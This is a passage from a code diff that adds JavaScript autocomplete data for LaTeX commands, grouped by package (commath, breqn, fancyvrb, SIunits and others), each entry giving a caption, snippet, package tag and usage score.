'diagbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'diagbox-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'diagbox-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'diagbox-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'diagbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'diagbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'diagbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'diagbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'diagbox-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'diagbox-cmd', + score: 
0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'diagbox-cmd', + score: 0.028955796305270766, + }, + ], + commath: [ + { + caption: '\\dod{}{}', + snippet: '\\dod{$1}{$2}', + meta: 'commath-cmd', + score: 7.950032807135384e-5, + }, + { + caption: '\\dpd{}{}', + snippet: '\\dpd{$1}{$2}', + meta: 'commath-cmd', + score: 0.00022966761442835552, + }, + { + caption: '\\dpd[]{}{}', + snippet: '\\dpd[$1]{$2}{$3}', + meta: 'commath-cmd', + score: 0.00022966761442835552, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'commath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'commath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'commath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'commath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'commath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'commath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'commath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'commath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'commath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'commath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'commath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'commath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'commath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'commath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'commath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'commath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'commath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'commath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'commath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'commath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'commath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'commath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: 
'\\atop', + meta: 'commath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'commath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'commath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'commath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'commath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'commath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'commath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'commath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'commath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'commath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'commath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'commath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'commath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'commath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'commath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'commath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'commath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'commath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'commath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'commath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'commath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'commath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'commath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'commath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'commath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'commath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + 
meta: 'commath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'commath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'commath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'commath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'commath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'commath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'commath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'commath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'commath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'commath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'commath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'commath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'commath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'commath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'commath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'commath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'commath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'commath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'commath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'commath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'commath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'commath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'commath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'commath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'commath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'commath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 
'commath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'commath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'commath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'commath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'commath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'commath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'commath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'commath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'commath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'commath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'commath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'commath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'commath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'commath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'commath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'commath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'commath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'commath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'commath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'commath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'commath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'commath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'commath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'commath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'commath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'commath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'commath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'commath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'commath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'commath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'commath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + 
snippet: '\\varliminf', + meta: 'commath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'commath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'commath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'commath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'commath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'commath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'commath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'commath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'commath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'commath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'commath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'commath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'commath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'commath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'commath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'commath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'commath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'commath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'commath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'commath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'commath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'commath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'commath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'commath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'commath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'commath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'commath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'commath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'commath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'commath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'commath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'commath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'commath-cmd', + score: 0.029440493885398676, 
+ }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'commath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'commath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'commath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'commath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'commath-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'commath-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'commath-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'commath-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'commath-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'commath-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'commath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'commath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'commath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'commath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'commath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'commath-cmd', + score: 0.0063276692758974925, + }, + ], + breqn: [ + { + caption: '\\biggl', + snippet: '\\biggl', + meta: 'breqn-cmd', + score: 0.0016066581118686831, + }, + { + caption: '\\biggl[]', + snippet: '\\biggl[$1]', + meta: 'breqn-cmd', + score: 0.0016066581118686831, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'breqn-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'breqn-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'breqn-cmd', + score: 7.847906405228455, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'breqn-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'breqn-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'breqn-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'breqn-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'breqn-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'breqn-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'breqn-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'breqn-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'breqn-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + 
meta: 'breqn-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'breqn-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'breqn-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'breqn-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'breqn-cmd', + score: 0.2864294797053033, + }, + ], + ClearSans: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ClearSans-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ClearSans-cmd', + score: 0.008565354665444157, + }, + ], + ccicons: [ + { + caption: '\\ccbynd', + snippet: '\\ccbynd', + meta: 'ccicons-cmd', + score: 0.0002103469673225986, + }, + { + caption: '\\ccbysa', + snippet: '\\ccbysa', + meta: 'ccicons-cmd', + score: 0.00016986782584471025, + }, + ], + varioref: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'varioref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\vref{}', + snippet: '\\vref{$1}', + meta: 'varioref-cmd', + score: 0.008565354665444157, + }, + ], + SIunits: [ + { + caption: '\\micro', + snippet: '\\micro', + meta: 'SIunits-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\meter', + snippet: '\\meter', + meta: 'SIunits-cmd', + score: 0.012499244923238213, + }, + { + caption: '\\cdot', + snippet: '\\cdot', + meta: 'SIunits-cmd', + score: 0.23029085545522762, + }, + { + caption: '\\degreecelsius', + snippet: '\\degreecelsius', + meta: 'SIunits-cmd', + score: 0.002130669712103909, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'SIunits-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'SIunits-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'SIunits-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'SIunits-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'SIunits-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'SIunits-cmd', + score: 0.0063276692758974925, + }, + ], + alltt: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'alltt-cmd', + score: 0.413853376001159, + }, + ], + fancyvrb: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fancyvrb-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fancyvrb-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'fancyvrb-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'fancyvrb-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fancyvrb-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fvset{}', + snippet: '\\fvset{$1}', + meta: 'fancyvrb-cmd', + score: 0.00015476887282479622, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'fancyvrb-cmd', + score: 0.00037306820619479756, + }, + ], + textgreek: [ + { + caption: '\\temp', + snippet: '\\temp', + meta: 'textgreek-cmd', + score: 0.0003566413345844499, + }, + {
caption: '\\temp{}', + snippet: '\\temp{$1}', + meta: 'textgreek-cmd', + score: 0.0003566413345844499, + }, + ], + endnotes: [ + { + caption: '\\endnote', + snippet: '\\endnote', + meta: 'endnotes-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\theendnotes', + snippet: '\\theendnotes', + meta: 'endnotes-cmd', + score: 0.0002788252334941383, + }, + ], + leading: [ + { + caption: '\\leading{}', + snippet: '\\leading{$1}', + meta: 'leading-cmd', + score: 0.00029077374894594517, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'leading-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'leading-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'leading-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'leading-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'leading-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'leading-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'leading-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'leading-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'leading-cmd', + score: 0.028955796305270766, + }, + ], + esvect: [ + { + caption: '\\vv', + snippet: '\\vv', + meta: 'esvect-cmd', + score: 0.003087420708479709, + }, + { + caption: '\\vv{}', + snippet: '\\vv{$1}', + 